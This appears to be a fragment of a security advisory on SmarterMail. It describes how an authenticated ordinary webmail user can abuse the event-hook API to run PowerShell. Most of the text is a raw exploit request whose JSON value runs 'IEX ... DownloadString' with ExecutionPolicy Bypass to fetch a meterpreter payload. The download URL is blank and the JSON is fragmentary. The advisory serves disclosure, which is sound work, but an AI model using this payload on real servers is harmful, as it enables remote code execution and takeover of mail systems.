
Upgrade to the latest version of SmarterMail;

Technical details

When authenticated as a “normal” webmail user it is possible to trigger a event-hook containing a Powershell download a meterpreter.ps1 file.

POST /api/v1/settings/event-hook HTTP/1.1
Host: test.local:9998
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.Content-Length: 1004
Origin: http://test.local:9998
Connection: close
Referer: http://test.local:9998/interface/root

      "value":"-ExecutionPolicy Bypass -NoExit \"IEX(New-Object System.Net.WebClient).DownloadString('');\""
      "hidden":true	,